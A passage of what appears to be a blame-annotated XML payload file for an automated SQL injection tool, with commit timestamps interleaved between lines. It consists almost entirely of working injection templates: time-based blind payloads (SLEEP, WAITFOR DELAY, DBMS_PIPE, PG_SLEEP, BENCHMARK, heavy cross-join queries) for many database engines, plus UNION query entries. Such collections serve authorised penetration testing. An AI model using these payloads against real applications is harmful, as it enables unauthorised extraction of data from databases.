2010-12-07 15:45:45 +03:00
<title > Microsoft SQL Server/Sybase OR time-based blind (heavy query)</title>
2010-12-06 22:11:05 +03:00
<stype > 5</stype>
<level > 3</level>
2010-12-07 15:45:45 +03:00
<risk > 3</risk>
2010-12-06 22:11:05 +03:00
<clause > 1,2,3</clause>
<where > 2</where>
2012-01-10 15:50:26 +04:00
<vector > OR [RANDNUM]=(CASE WHEN ([INFERENCE]) THEN (SELECT COUNT(*) FROM sysusers AS sys1,sysusers AS sys2,sysusers AS sys3,sysusers AS sys4,sysusers AS sys5,sysusers AS sys6,sysusers AS sys7) ELSE [RANDNUM] END)</vector>
2010-12-06 22:11:05 +03:00
<request >
2012-01-10 15:50:26 +04:00
<payload > OR [RANDNUM]=(SELECT COUNT(*) FROM sysusers AS sys1,sysusers AS sys2,sysusers AS sys3,sysusers AS sys4,sysusers AS sys5,sysusers AS sys6,sysusers AS sys7)</payload>
2010-12-06 22:11:05 +03:00
</request>
<response >
2010-12-07 03:27:26 +03:00
<time > [DELAYED]</time>
2010-12-06 22:11:05 +03:00
</response>
<details >
2010-12-07 15:45:45 +03:00
<dbms > Microsoft SQL Server</dbms>
2011-02-14 00:20:21 +03:00
<dbms > Sybase</dbms>
2011-01-21 00:42:55 +03:00
<os > Windows</os>
2010-12-06 22:11:05 +03:00
</details>
</test>
2010-12-07 03:51:14 +03:00
<test >
2010-12-07 15:45:45 +03:00
<title > Oracle OR time-based blind</title>
2010-12-07 03:51:14 +03:00
<stype > 5</stype>
<level > 3</level>
<risk > 3</risk>
<clause > 1,2,3</clause>
<where > 2</where>
2010-12-07 15:45:45 +03:00
<vector > OR [RANDNUM]=(CASE WHEN ([INFERENCE]) THEN DBMS_PIPE.RECEIVE_MESSAGE('[RANDSTR]',[SLEEPTIME]) ELSE [RANDNUM] END)</vector>
2010-12-07 03:51:14 +03:00
<request >
2010-12-07 15:45:45 +03:00
<payload > OR [RANDNUM]=DBMS_PIPE.RECEIVE_MESSAGE('[RANDSTR]',[SLEEPTIME])</payload>
2010-12-07 03:51:14 +03:00
</request>
<response >
2010-12-07 15:45:45 +03:00
<time > [SLEEPTIME]</time>
2010-12-07 03:51:14 +03:00
</response>
<details >
2010-12-07 15:45:45 +03:00
<dbms > Oracle</dbms>
2010-12-07 03:51:14 +03:00
</details>
</test>
2010-12-06 22:11:05 +03:00
<test >
2010-12-07 15:45:45 +03:00
<title > Oracle OR time-based blind (heavy query)</title>
2010-12-06 22:11:05 +03:00
<stype > 5</stype>
2010-12-20 13:33:24 +03:00
<level > 4</level>
<risk > 3</risk>
2010-12-06 22:11:05 +03:00
<clause > 1,2,3</clause>
<where > 2</where>
2011-03-08 17:29:22 +03:00
<vector > OR [RANDNUM]=(CASE WHEN ([INFERENCE]) THEN (SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5) ELSE [RANDNUM] END)</vector>
2010-12-06 22:11:05 +03:00
<request >
2011-03-08 17:29:22 +03:00
<payload > OR [RANDNUM]=(SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5)</payload>
2010-12-06 22:11:05 +03:00
</request>
<response >
2010-12-07 03:27:26 +03:00
<time > [DELAYED]</time>
2010-12-06 22:11:05 +03:00
</response>
<details >
2010-12-07 15:45:45 +03:00
<dbms > Oracle</dbms>
2010-12-06 22:11:05 +03:00
</details>
</test>
<test >
2010-12-07 15:45:45 +03:00
<title > SQLite > 2.0 OR time-based blind (heavy query)</title>
2010-11-28 21:10:54 +03:00
<stype > 5</stype>
<level > 4</level>
<risk > 3</risk>
<clause > 1</clause>
2010-12-08 14:49:55 +03:00
<where > 2</where>
2011-03-08 17:29:22 +03:00
<vector > OR [RANDNUM]=(CASE WHEN ([INFERENCE]) THEN (LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB([SLEEPTIME]0000000))))) ELSE [RANDNUM] END)</vector>
2010-11-28 21:10:54 +03:00
<request >
2011-03-08 17:29:22 +03:00
<payload > OR [RANDNUM]=LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB([SLEEPTIME]0000000))))</payload>
2010-11-28 21:10:54 +03:00
</request>
<response >
2010-12-07 03:27:26 +03:00
<time > [DELAYED]</time>
2010-11-28 21:10:54 +03:00
</response>
<details >
<dbms > SQLite</dbms>
<dbms_version > > 2.0</dbms_version>
</details>
</test>
<test >
2010-12-06 22:11:05 +03:00
<title > Firebird OR time-based blind (heavy query)</title>
2010-11-28 21:10:54 +03:00
<stype > 5</stype>
<level > 5</level>
<risk > 3</risk>
<clause > 1</clause>
2010-12-03 15:15:41 +03:00
<where > 2</where>
2011-03-08 17:29:22 +03:00
<vector > OR [RANDNUM]=IIF(([INFERENCE]),(SELECT COUNT(*) FROM RDB$FIELDS AS T1,RDB$TYPES AS T2,RDB$COLLATIONS AS T3),[RANDNUM])</vector>
2010-11-28 21:10:54 +03:00
<request >
2011-03-08 17:29:22 +03:00
<payload > OR [RANDNUM]=(SELECT COUNT(*) FROM RDB$FIELDS AS T1,RDB$TYPES AS T2,RDB$COLLATIONS AS T3)</payload>
2010-11-28 21:10:54 +03:00
</request>
<response >
2010-12-07 03:27:26 +03:00
<time > [DELAYED]</time>
2010-11-28 21:10:54 +03:00
</response>
<details >
<dbms > Firebird</dbms>
2010-12-11 14:03:32 +03:00
<dbms_version > > = 2.0</dbms_version>
2010-11-28 21:10:54 +03:00
</details>
</test>
2011-06-26 20:38:22 +04:00
2011-06-27 03:46:09 +04:00
<test >
<title > SAP MaxDB OR time-based blind (heavy query - comment)</title>
<stype > 5</stype>
<level > 4</level>
<risk > 3</risk>
<clause > 1,2,3</clause>
<where > 2</where>
<vector > OR [RANDNUM]=(SELECT COUNT(*) FROM (SELECT * FROM DOMAIN.DOMAINS WHERE ([INFERENCE])) AS T1, (SELECT * FROM DOMAIN.COLUMNS WHERE ([INFERENCE])) AS T2, (SELECT * FROM DOMAIN.TABLES WHERE ([INFERENCE])) AS T3)</vector>
<request >
<payload > OR [RANDNUM]=(SELECT COUNT(*) FROM DOMAIN.DOMAINS AS T1, DOMAIN.COLUMNS AS T2, DOMAIN.TABLES AS T3)</payload>
</request>
<response >
<time > [DELAYED]</time>
</response>
<details >
<dbms > SAP MaxDB</dbms>
</details>
</test>
2011-06-26 20:38:22 +04:00
<test >
2011-06-27 12:58:59 +04:00
<title > IBM DB2 OR time-based blind (heavy query)</title>
2011-06-26 20:38:22 +04:00
<stype > 5</stype>
2011-06-27 03:46:09 +04:00
<level > 4</level>
2011-06-26 20:38:22 +04:00
<risk > 3</risk>
<clause > 1,2,3</clause>
<where > 2</where>
<vector > OR [RANDNUM]=(SELECT COUNT(*) FROM SYSIBM.SYSTABLES AS T1,SYSIBM.SYSTABLES AS T2,SYSIBM.SYSTABLES AS T3 WHERE ([INFERENCE]))</vector>
<request >
<payload > OR [RANDNUM]=(SELECT COUNT(*) FROM SYSIBM.SYSTABLES AS T1,SYSIBM.SYSTABLES AS T2,SYSIBM.SYSTABLES AS T3)</payload>
</request>
<response >
<time > [DELAYED]</time>
</response>
<details >
2011-06-27 12:58:59 +04:00
<dbms > IBM DB2</dbms>
2011-06-26 20:38:22 +04:00
</details>
</test>
2011-06-27 03:46:09 +04:00
<!-- TODO: if possible, add payload for Microsoft Access -->
2010-11-28 21:10:54 +03:00
<!-- End of OR time - based blind tests -->
2011-01-12 01:56:21 +03:00
2012-07-17 13:13:09 +04:00
<!-- Time - based blind tests - GROUP BY and ORDER BY clauses -->
<test >
<title > MySQL > = 5.0.11 time-based blind - GROUP BY and ORDER BY clauses</title>
<stype > 5</stype>
<level > 3</level>
2012-07-18 01:52:28 +04:00
<risk > 1</risk>
2012-07-17 13:13:09 +04:00
<clause > 2,3</clause>
<where > 1</where>
<vector > ,(SELECT (CASE WHEN ([INFERENCE]) THEN SLEEP([SLEEPTIME]) ELSE [RANDNUM]*(SELECT [RANDNUM] FROM INFORMATION_SCHEMA.CHARACTER_SETS) END))</vector>
<request >
<payload > ,(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN SLEEP([SLEEPTIME]) ELSE [RANDNUM]*(SELECT [RANDNUM] FROM INFORMATION_SCHEMA.CHARACTER_SETS) END))</payload>
</request>
<response >
2012-07-18 01:52:28 +04:00
<time > [SLEEPTIME]</time>
2012-07-17 13:13:09 +04:00
</response>
<details >
<dbms > MySQL</dbms>
<dbms_version > > = 5.0.11</dbms_version>
</details>
</test>
<test >
2012-07-18 01:52:28 +04:00
<title > MySQL < 5.0.12 time-based blind - GROUP BY and ORDER BY clauses (heavy query)</title>
2012-07-17 13:13:09 +04:00
<stype > 5</stype>
<level > 4</level>
<risk > 2</risk>
<clause > 2,3</clause>
<where > 1</where>
<vector > ,(SELECT (CASE WHEN ([INFERENCE]) THEN (SELECT BENCHMARK([SLEEPTIME]000000,MD5('[RANDSTR]'))) ELSE [RANDNUM]*(SELECT [RANDNUM] FROM mysql.db) END))</vector>
<request >
<payload > ,(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN (SELECT BENCHMARK([SLEEPTIME]000000,MD5('[RANDSTR]'))) ELSE [RANDNUM]*(SELECT [RANDNUM] FROM mysql.db) END))</payload>
</request>
<response >
<time > [DELAYED]</time>
</response>
<details >
<dbms > MySQL</dbms>
</details>
</test>
2012-07-18 01:52:28 +04:00
<test >
<title > PostgreSQL > 8.1 time-based blind - GROUP BY and ORDER BY clauses</title>
<stype > 5</stype>
<level > 3</level>
<risk > 1</risk>
<clause > 2,3</clause>
<where > 1</where>
<vector > ,(SELECT (CASE WHEN ([INFERENCE]) THEN (SELECT [RANDNUM] FROM PG_SLEEP([SLEEPTIME])) ELSE 1/(SELECT 0) END))</vector>
<request >
<payload > ,(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN (SELECT [RANDNUM] FROM PG_SLEEP([SLEEPTIME])) ELSE 1/(SELECT 0) END))</payload>
</request>
<response >
<time > [SLEEPTIME]</time>
</response>
<details >
<dbms > PostgreSQL</dbms>
<dbms_version > > 8.1</dbms_version>
</details>
</test>
<test >
<title > PostgreSQL time-based blind - GROUP BY and ORDER BY clauses (heavy query)</title>
<stype > 5</stype>
<level > 4</level>
<risk > 2</risk>
<clause > 2,3</clause>
<where > 1</where>
<vector > ,(SELECT (CASE WHEN ([INFERENCE]) THEN (SELECT COUNT(*) FROM GENERATE_SERIES(1,[SLEEPTIME]000000)) ELSE 1/(SELECT 0) END))</vector>
<request >
<payload > ,(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN (SELECT COUNT(*) FROM GENERATE_SERIES(1,[SLEEPTIME]000000)) ELSE 1/(SELECT 0) END))</payload>
</request>
<response >
<time > [DELAYED]</time>
</response>
<details >
<dbms > PostgreSQL</dbms>
</details>
</test>
<test >
<title > Microsoft SQL Server/Sybase time-based blind - ORDER BY clauses</title>
<stype > 5</stype>
<level > 3</level>
<risk > 1</risk>
<clause > 2,3</clause>
<where > 1</where>
<vector > ,(SELECT (CASE WHEN ([INFERENCE]) THEN WAITFOR DELAY '0:0:[SLEEPTIME]' ELSE [RANDNUM]*(SELECT [RANDNUM] FROM master..sysdatabases) END))</vector>
<request >
<payload > ,(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN WAITFOR DELAY '0:0:[SLEEPTIME]' ELSE [RANDNUM]*(SELECT [RANDNUM] FROM master..sysdatabases) END))</payload>
</request>
<response >
<time > [SLEEPTIME]</time>
</response>
<details >
<dbms > Microsoft SQL Server</dbms>
<dbms > Sybase</dbms>
<os > Windows</os>
</details>
</test>
<test >
<title > Microsoft SQL Server/Sybase time-based blind - ORDER BY clause (heavy query)</title>
<stype > 5</stype>
<level > 4</level>
<risk > 2</risk>
<clause > 2,3</clause>
<where > 1</where>
<vector > ,(SELECT (CASE WHEN ([INFERENCE]) THEN (SELECT COUNT(*) FROM sysusers AS sys1,sysusers AS sys2,sysusers AS sys3,sysusers AS sys4,sysusers AS sys5,sysusers AS sys6,sysusers AS sys7) ELSE [RANDNUM]*(SELECT [RANDNUM] FROM master..sysdatabases) END))</vector>
<request >
<payload > ,(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN (SELECT COUNT(*) FROM sysusers AS sys1,sysusers AS sys2,sysusers AS sys3,sysusers AS sys4,sysusers AS sys5,sysusers AS sys6,sysusers AS sys7) ELSE [RANDNUM]*(SELECT [RANDNUM] FROM master..sysdatabases) END))</payload>
</request>
<response >
<time > [DELAYED]</time>
</response>
<details >
<dbms > Microsoft SQL Server</dbms>
<dbms > Sybase</dbms>
<os > Windows</os>
</details>
</test>
<test >
<title > Oracle time-based blind - GROUP BY and ORDER BY clauses</title>
<stype > 5</stype>
<level > 3</level>
<risk > 1</risk>
<clause > 2,3</clause>
<where > 1</where>
<vector > ,(SELECT (CASE WHEN ([INFERENCE]) THEN DBMS_PIPE.RECEIVE_MESSAGE('[RANDSTR]',[SLEEPTIME]) ELSE 1/(SELECT 0 FROM DUAL) END) FROM DUAL)</vector>
<request >
<payload > ,(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN DBMS_PIPE.RECEIVE_MESSAGE('[RANDSTR]',[SLEEPTIME]) ELSE 1/(SELECT 0 FROM DUAL) END) FROM DUAL)</payload>
</request>
<response >
<time > [SLEEPTIME]</time>
</response>
<details >
<dbms > Oracle</dbms>
</details>
</test>
<test >
<title > Oracle time-based blind - GROUP BY and ORDER BY clauses (heavy query)</title>
<stype > 5</stype>
<level > 4</level>
<risk > 2</risk>
<clause > 2,3</clause>
<where > 1</where>
<vector > ,(SELECT (CASE WHEN ([INFERENCE]) THEN (SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5) ELSE 1/(SELECT 0 FROM DUAL) END) FROM DUAL)</vector>
<request >
<payload > ,(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN (SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5) ELSE 1/(SELECT 0 FROM DUAL) END) FROM DUAL)</payload>
</request>
<response >
<time > [DELAYED]</time>
</response>
<details >
<dbms > Oracle</dbms>
</details>
</test>
<!-- TODO: if possible, add payload for Microsoft Access -->
2012-07-17 13:13:09 +04:00
<!-- End of time - based blind tests - GROUP BY and ORDER BY clause -->
2011-01-12 01:18:47 +03:00
<!-- UNION query tests -->
2011-01-18 01:57:33 +03:00
<test >
2011-05-10 19:34:54 +04:00
<title > MySQL UNION query ([CHAR]) - [COLSTART] to [COLSTOP] columns (custom)</title>
<stype > 3</stype>
<level > 1</level>
<risk > 1</risk>
<clause > 1,2,3,4,5</clause>
<where > 1</where>
<vector > [UNION]</vector>
<request >
<payload />
<comment > #</comment>
<char > [CHAR]</char>
<columns > [COLSTART]-[COLSTOP]</columns>
</request>
<response >
<union />
</response>
<details >
<dbms > MySQL</dbms>
</details>
</test>
<test >
<title > MySQL UNION query (NULL) - [COLSTART] to [COLSTOP] columns (custom)</title>
2011-01-18 01:57:33 +03:00
<stype > 3</stype>
<level > 1</level>
<risk > 1</risk>
<clause > 1,2,3,4,5</clause>
<where > 1</where>
<vector > [UNION]</vector>
<request >
<payload />
<comment > #</comment>
<char > NULL</char>
<columns > [COLSTART]-[COLSTOP]</columns>
</request>
<response >
<union />
</response>
<details >
<dbms > MySQL</dbms>
</details>
</test>
2011-04-07 17:39:36 +04:00
<test >
2011-05-10 19:34:54 +04:00
<title > MySQL UNION query ([RANDNUM]) - [COLSTART] to [COLSTOP] columns (custom)</title>
2011-04-07 17:39:36 +04:00
<stype > 3</stype>
<level > 3</level>
<risk > 1</risk>
<clause > 1,2,3,4,5</clause>
<where > 1</where>
<vector > [UNION]</vector>
<request >
<payload />
<comment > #</comment>
<char > [RANDNUM]</char>
<columns > [COLSTART]-[COLSTOP]</columns>
</request>
<response >
<union />
</response>
<details >
<dbms > MySQL</dbms>
</details>
</test>
2011-01-12 01:18:47 +03:00
<test >
2012-04-26 00:37:39 +04:00
<title > MySQL UNION query ([CHAR]) - 1 to 10 columns</title>
2011-01-12 01:18:47 +03:00
<stype > 3</stype>
<level > 1</level>
<risk > 1</risk>
<clause > 1,2,3,4,5</clause>
<where > 1</where>
<vector > [UNION]</vector>
2011-05-10 19:34:54 +04:00
<request >
<payload />
<comment > #</comment>
<char > [CHAR]</char>
2012-04-26 00:37:39 +04:00
<columns > 1-10</columns>
2011-05-10 19:34:54 +04:00
</request>
<response >
<union />
</response>
<details >
<dbms > MySQL</dbms>
</details>
</test>
<test >
2012-04-26 00:37:39 +04:00
<title > MySQL UNION query (NULL) - 1 to 10 columns</title>
2011-05-10 19:34:54 +04:00
<stype > 3</stype>
<level > 1</level>
<risk > 1</risk>
<clause > 1,2,3,4,5</clause>
<where > 1</where>
<vector > [UNION]</vector>
2011-01-12 01:56:21 +03:00
<request >
<payload />
<comment > #</comment>
<char > NULL</char>
2012-04-26 00:37:39 +04:00
<columns > 1-10</columns>
2011-01-12 01:56:21 +03:00
</request>
<response >
<union />
</response>
<details >
<dbms > MySQL</dbms>
</details>
</test>
2011-04-07 17:39:36 +04:00
<test >
2012-04-26 00:37:39 +04:00
<title > MySQL UNION query ([RANDNUM]) - 1 to 10 columns</title>
2011-04-07 17:39:36 +04:00
<stype > 3</stype>
<level > 3</level>
<risk > 1</risk>
<clause > 1,2,3,4,5</clause>
<where > 1</where>
<vector > [UNION]</vector>
<request >
<payload />
<comment > #</comment>
<char > [RANDNUM]</char>
2012-04-26 00:37:39 +04:00
<columns > 1-10</columns>
2011-04-07 17:39:36 +04:00
</request>
<response >
<union />
</response>
<details >
<dbms > MySQL</dbms>
</details>
</test>
2011-01-12 01:56:21 +03:00
<test >
2012-04-26 00:37:39 +04:00
<title > MySQL UNION query ([CHAR]) - 11 to 20 columns</title>
2011-01-12 01:56:21 +03:00
<stype > 3</stype>
<level > 2</level>
<risk > 1</risk>
<clause > 1,2,3,4,5</clause>
<where > 1</where>
<vector > [UNION]</vector>
2011-05-10 19:34:54 +04:00
<request >
<payload />
<comment > #</comment>
<char > [CHAR]</char>
2012-04-26 00:37:39 +04:00
<columns > 11-20</columns>
2011-05-10 19:34:54 +04:00
</request>
<response >
<union />
</response>
<details >
<dbms > MySQL</dbms>
</details>
</test>
<test >
2012-04-26 00:37:39 +04:00
<title > MySQL UNION query (NULL) - 11 to 20 columns</title>
2011-05-10 19:34:54 +04:00
<stype > 3</stype>
<level > 2</level>
<risk > 1</risk>
<clause > 1,2,3,4,5</clause>
<where > 1</where>
<vector > [UNION]</vector>
2011-01-12 01:18:47 +03:00
<request >
<payload />
<comment > #</comment>
<char > NULL</char>
2012-04-26 00:37:39 +04:00
<columns > 11-20</columns>
2011-01-12 01:18:47 +03:00
</request>
<response >
<union />
</response>
<details >
<dbms > MySQL</dbms>
</details>
</test>
2011-04-07 17:39:36 +04:00
<test >
2012-04-26 00:37:39 +04:00
<title > MySQL UNION query ([RANDNUM]) - 11 to 20 columns</title>
2011-04-07 17:39:36 +04:00
<stype > 3</stype>
<level > 3</level>
<risk > 1</risk>
<clause > 1,2,3,4,5</clause>
<where > 1</where>
<vector > [UNION]</vector>
<request >
<payload />
<comment > #</comment>
<char > [RANDNUM]</char>
2012-04-26 00:37:39 +04:00
<columns > 11-20</columns>
2011-04-07 17:39:36 +04:00
</request>
<response >
<union />
</response>
<details >
<dbms > MySQL</dbms>
</details>
</test>
2011-01-12 01:56:21 +03:00
<test >
2012-04-26 00:37:39 +04:00
<title > MySQL UNION query ([CHAR]) - 21 to 30 columns</title>
2011-01-12 01:56:21 +03:00
<stype > 3</stype>
<level > 3</level>
<risk > 1</risk>
<clause > 1,2,3,4,5</clause>
<where > 1</where>
<vector > [UNION]</vector>
2011-05-10 19:34:54 +04:00
<request >
<payload />
<comment > #</comment>
<char > [CHAR]</char>
2012-04-26 00:37:39 +04:00
<columns > 21-30</columns>
2011-05-10 19:34:54 +04:00
</request>
<response >
<union />
</response>
<details >
<dbms > MySQL</dbms>
</details>
</test>
<test >
2012-04-26 00:37:39 +04:00
<title > MySQL UNION query (NULL) - 21 to 30 columns</title>
2011-05-10 19:34:54 +04:00
<stype > 3</stype>
<level > 3</level>
<risk > 1</risk>
<clause > 1,2,3,4,5</clause>
<where > 1</where>
<vector > [UNION]</vector>
2011-01-12 01:56:21 +03:00
<request >
<payload />
<comment > #</comment>
<char > NULL</char>
2012-04-26 00:37:39 +04:00
<columns > 21-30</columns>
2011-01-12 01:56:21 +03:00
</request>
<response >
<union />
</response>
<details >
<dbms > MySQL</dbms>
</details>
</test>
2011-04-07 17:39:36 +04:00
<test >
2012-04-26 00:37:39 +04:00
<title > MySQL UNION query ([RANDNUM]) - 21 to 30 columns</title>
2011-04-07 17:39:36 +04:00
<stype > 3</stype>
<level > 4</level>
<risk > 1</risk>
<clause > 1,2,3,4,5</clause>
<where > 1</where>
<vector > [UNION]</vector>
<request >
<payload />
<comment > #</comment>
<char > [RANDNUM]</char>
2012-04-26 00:37:39 +04:00
<columns > 21-30</columns>
2011-04-07 17:39:36 +04:00
</request>
<response >
<union />
</response>
<details >
<dbms > MySQL</dbms>
</details>
</test>
2011-01-12 01:56:21 +03:00
<test >
2012-04-26 00:37:39 +04:00
<title > MySQL UNION query ([CHAR]) - 31 to 40 columns</title>
2011-01-12 01:56:21 +03:00
<stype > 3</stype>
<level > 4</level>
<risk > 1</risk>
<clause > 1,2,3,4,5</clause>
<where > 1</where>
<vector > [UNION]</vector>
2011-05-10 19:34:54 +04:00
<request >
<payload />
<comment > #</comment>
<char > [CHAR]</char>
2012-04-26 00:37:39 +04:00
<columns > 31-40</columns>
2011-05-10 19:34:54 +04:00
</request>
<response >
<union />
</response>
<details >
<dbms > MySQL</dbms>
</details>
</test>
<test >
2012-04-26 00:37:39 +04:00
<title > MySQL UNION query (NULL) - 31 to 40 columns</title>
2011-05-10 19:34:54 +04:00
<stype > 3</stype>
<level > 4</level>
<risk > 1</risk>
<clause > 1,2,3,4,5</clause>
<where > 1</where>
<vector > [UNION]</vector>
2011-01-12 01:56:21 +03:00
<request >
<payload />
<comment > #</comment>
<char > NULL</char>
2012-04-26 00:37:39 +04:00
<columns > 31-40</columns>
2011-01-12 01:56:21 +03:00
</request>
<response >
<union />
</response>
<details >
<dbms > MySQL</dbms>
</details>
</test>
2011-04-07 17:39:36 +04:00
<test >
2012-04-26 00:37:39 +04:00
<title > MySQL UNION query ([RANDNUM]) - 31 to 40 columns</title>
2011-04-07 17:39:36 +04:00
<stype > 3</stype>
<level > 5</level>
<risk > 1</risk>
<clause > 1,2,3,4,5</clause>
<where > 1</where>
<vector > [UNION]</vector>
<request >
<payload />
<comment > #</comment>
<char > [RANDNUM]</char>
2012-04-26 00:37:39 +04:00
<columns > 31-40</columns>
2011-04-07 17:39:36 +04:00
</request>
<response >
<union />
</response>
<details >
<dbms > MySQL</dbms>
</details>
</test>
2011-01-12 01:56:21 +03:00
<test >
2012-04-26 00:37:39 +04:00
<title > MySQL UNION query ([CHAR]) - 41 to 50 columns</title>
2011-01-12 01:56:21 +03:00
<stype > 3</stype>
<level > 5</level>
<risk > 1</risk>
<clause > 1,2,3,4,5</clause>
<where > 1</where>
<vector > [UNION]</vector>
2011-05-10 19:34:54 +04:00
<request >
<payload />
<comment > #</comment>
<char > [CHAR]</char>
2012-04-26 00:37:39 +04:00
<columns > 41-50</columns>
2011-05-10 19:34:54 +04:00
</request>
<response >
<union />
</response>
<details >
<dbms > MySQL</dbms>
</details>
</test>
<test >
2012-04-26 00:37:39 +04:00
<title > MySQL UNION query (NULL) - 41 to 50 columns</title>
2011-05-10 19:34:54 +04:00
<stype > 3</stype>
<level > 5</level>
<risk > 1</risk>
<clause > 1,2,3,4,5</clause>
<where > 1</where>
<vector > [UNION]</vector>
2011-01-12 01:56:21 +03:00
<request >
<payload />
<comment > #</comment>
<char > NULL</char>
2012-04-26 00:37:39 +04:00
<columns > 41-50</columns>
2011-01-12 01:56:21 +03:00
</request>
<response >
<union />
</response>
<details >
<dbms > MySQL</dbms>
</details>
</test>
2011-04-07 17:39:36 +04:00
<test >
2012-04-26 00:37:39 +04:00
<title > MySQL UNION query ([RANDNUM]) - 41 to 50 columns</title>
2011-04-07 17:39:36 +04:00
<stype > 3</stype>
<level > 5</level>
<risk > 1</risk>
<clause > 1,2,3,4,5</clause>
<where > 1</where>
<vector > [UNION]</vector>
<request >
<payload />
<comment > #</comment>
<char > [RANDNUM]</char>
2012-04-26 00:37:39 +04:00
<columns > 41-50</columns>
2011-04-07 17:39:36 +04:00
</request>
<response >
<union />
</response>
<details >
<dbms > MySQL</dbms>
</details>
</test>
2011-07-07 17:20:40 +04:00
<test >
2011-07-11 13:47:52 +04:00
<title > Generic UNION query ([CHAR]) - [COLSTART] to [COLSTOP] columns (custom)</title>
2011-07-07 17:20:40 +04:00
<stype > 3</stype>
<level > 1</level>
<risk > 1</risk>
<clause > 1,2,3,4,5</clause>
<where > 1</where>
<vector > [UNION]</vector>
<request >
<payload />
2011-07-11 13:47:52 +04:00
<comment > -- </comment>
2011-07-07 17:20:40 +04:00
<char > [CHAR]</char>
<columns > [COLSTART]-[COLSTOP]</columns>
</request>
<response >
<union />
</response>
</test>
<test >
2011-07-11 13:47:52 +04:00
<title > Generic UNION query (NULL) - [COLSTART] to [COLSTOP] columns (custom)</title>
2011-07-07 17:20:40 +04:00
<stype > 3</stype>
<level > 1</level>
<risk > 1</risk>
<clause > 1,2,3,4,5</clause>
<where > 1</where>
<vector > [UNION]</vector>
<request >
<payload />
2011-07-11 13:47:52 +04:00
<comment > -- </comment>
2011-07-07 17:20:40 +04:00
<char > NULL</char>
<columns > [COLSTART]-[COLSTOP]</columns>
</request>
<response >
<union />
</response>
</test>
<test >
2011-07-11 13:47:52 +04:00
<title > Generic UNION query ([RANDNUM]) - [COLSTART] to [COLSTOP] columns (custom)</title>
2011-07-07 17:20:40 +04:00
<stype > 3</stype>
<level > 3</level>
<risk > 1</risk>
<clause > 1,2,3,4,5</clause>
<where > 1</where>
<vector > [UNION]</vector>
<request >
<payload />
2011-07-11 13:47:52 +04:00
<comment > -- </comment>
2011-07-07 17:20:40 +04:00
<char > [RANDNUM]</char>
<columns > [COLSTART]-[COLSTOP]</columns>
</request>
<response >
<union />
</response>
</test>
<test >
2012-04-26 00:37:39 +04:00
<title > Generic UNION query ([CHAR]) - 1 to 10 columns</title>
2011-07-07 17:20:40 +04:00
<stype > 3</stype>
<level > 1</level>
<risk > 1</risk>
<clause > 1,2,3,4,5</clause>
<where > 1</where>
<vector > [UNION]</vector>
<request >
<payload />
2011-07-11 13:47:52 +04:00
<comment > -- </comment>
2011-07-07 17:20:40 +04:00
<char > [CHAR]</char>
2012-04-26 00:37:39 +04:00
<columns > 1-10</columns>
2011-07-07 17:20:40 +04:00
</request>
<response >
<union />
</response>
</test>
<test >
2012-04-26 00:37:39 +04:00
<title > Generic UNION query (NULL) - 1 to 10 columns</title>
2011-07-07 17:20:40 +04:00
<stype > 3</stype>
<level > 1</level>
<risk > 1</risk>
<clause > 1,2,3,4,5</clause>
<where > 1</where>
<vector > [UNION]</vector>
<request >
<payload />
2011-07-11 13:47:52 +04:00
<comment > -- </comment>
2011-07-07 17:20:40 +04:00
<char > NULL</char>
2012-04-26 00:37:39 +04:00
<columns > 1-10</columns>
2011-07-07 17:20:40 +04:00
</request>
<response >
<union />
</response>
</test>
<test >
2012-04-26 00:37:39 +04:00
<title > Generic UNION query ([RANDNUM]) - 1 to 10 columns</title>
2011-07-07 17:20:40 +04:00
<stype > 3</stype>
<level > 3</level>
<risk > 1</risk>
<clause > 1,2,3,4,5</clause>
<where > 1</where>
<vector > [UNION]</vector>
<request >
<payload />
2011-07-11 13:47:52 +04:00
<comment > -- </comment>
2011-07-07 17:20:40 +04:00
<char > [RANDNUM]</char>
2012-04-26 00:37:39 +04:00
<columns > 1-10</columns>
2011-07-07 17:20:40 +04:00
</request>
<response >
<union />
</response>
</test>
<test >
2012-04-26 00:37:39 +04:00
<title > Generic UNION query ([CHAR]) - 11 to 20 columns</title>
2011-07-07 17:20:40 +04:00
<stype > 3</stype>
<level > 2</level>
<risk > 1</risk>
<clause > 1,2,3,4,5</clause>
<where > 1</where>
<vector > [UNION]</vector>
<request >
<payload />
2011-07-11 13:47:52 +04:00
<comment > -- </comment>
2011-07-07 17:20:40 +04:00
<char > [CHAR]</char>
2012-04-26 00:37:39 +04:00
<columns > 11-20</columns>
2011-07-07 17:20:40 +04:00
</request>
<response >
<union />
</response>
</test>
<test >
2012-04-26 00:37:39 +04:00
<title > Generic UNION query (NULL) - 11 to 20 columns</title>
2011-07-07 17:20:40 +04:00
<stype > 3</stype>
<level > 2</level>
<risk > 1</risk>
<clause > 1,2,3,4,5</clause>
<where > 1</where>
<vector > [UNION]</vector>
<request >
<payload />
2011-07-11 13:47:52 +04:00
<comment > -- </comment>
2011-07-07 17:20:40 +04:00
<char > NULL</char>
2012-04-26 00:37:39 +04:00
<columns > 11-20</columns>
2011-07-07 17:20:40 +04:00
</request>
<response >
<union />
</response>
</test>
<test >
2012-04-26 00:37:39 +04:00
<title > Generic UNION query ([RANDNUM]) - 11 to 20 columns</title>
2011-07-07 17:20:40 +04:00
<stype > 3</stype>
<level > 3</level>
<risk > 1</risk>
<clause > 1,2,3,4,5</clause>
<where > 1</where>
<vector > [UNION]</vector>
<request >
<payload />
2011-07-11 13:47:52 +04:00
<comment > -- </comment>
2011-07-07 17:20:40 +04:00
<char > [RANDNUM]</char>
2012-04-26 00:37:39 +04:00
<columns > 11-20</columns>
